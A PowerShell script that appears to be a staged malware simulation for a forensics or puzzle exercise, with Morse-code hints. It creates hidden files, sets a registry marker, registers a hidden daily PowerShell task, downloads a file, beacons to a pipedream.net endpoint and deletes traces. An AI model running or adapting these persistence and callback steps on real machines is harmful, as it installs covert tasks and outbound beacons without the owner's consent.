# UID = 2848516423

$folder = "C:\ProgramData\sysdiag"
if (-not (Test-Path $folder)) {
    New-Item -Path $folder -ItemType Directory | Out-Null
}

New-Item -Path "$folder\flock.cfg" -ItemType File -Force | Out-Null
Add-Content -Path "$folder\flock.cfg" -Value "status=active"
Add-Content -Path "$folder\flock.cfg" -Value "flock_id=1914"
Add-Content -Path "$folder\flock.cfg" -Value "note=internal operative compromised. seek the shepherd"

New-Item -Path "$folder\stage2.txt" -ItemType File -Force | Out-Null
Add-Content -Path "$folder\stage2.txt" -Value "Session=Active"
Add-Content -Path "$folder\stage2.txt" -Value "Operator=RS_2025"
Add-Content -Path "$folder\stage2.txt" -Value "Hint= - .... . / .- ..- - .... --- .-. / .. ... / .... .. -.. -.. . -. / .. -. / .-. --- - .- - .. --- -. .-.-.- / - .... .. .-. - . . -. / - ..- .-. -. ... / ... .... --- ..- .-.. -.. / ... .... --- .-- / -.-- --- ..- / - .... . / ... .... . . .--. .-.-.-"

$img = "https://raw.githubusercontent.com/flocktrack/sysdiag-utils/main/shepherd.jpg"
Invoke-WebRequest -Uri $img -OutFile "$folder\shepherd.jpg" -UseBasicParsing -ErrorAction SilentlyContinue

$regPath = "HKCU:\Software\SystemMonitor"
if (-not (Test-Path $regPath)) {
    New-Item -Path $regPath -Force | Out-Null
}
New-ItemProperty -Path $regPath -Name "Stage1" -Value "Completed" -PropertyType String -Force | Out-Null

$taskName = "DiagWatcher"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-nop -w hidden -c Start-Sleep 5"
$trigger = New-ScheduledTaskTrigger -Daily -At 3am
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Description "System diagnostic script" -User $env:USERNAME -RunLevel Limited -Force | Out-Null

$tcp = New-Object Net.Sockets.TcpClient; $tcp.Connect("4dd78a612e842a233dd99dfa453e1ed6.m.pipedream.net",443); $tcp.Close()
Invoke-WebRequest -Uri "https://4dd78a612e842a233dd99dfa453e1ed6.m.pipedream.net" -UseBasicParsing

Start-Sleep -Seconds 1
Remove-Item -Path "$folder\config.sys" -ErrorAction SilentlyContinue
Remove-Item -Path "$folder\config.ps1" -ErrorAction SilentlyContinue
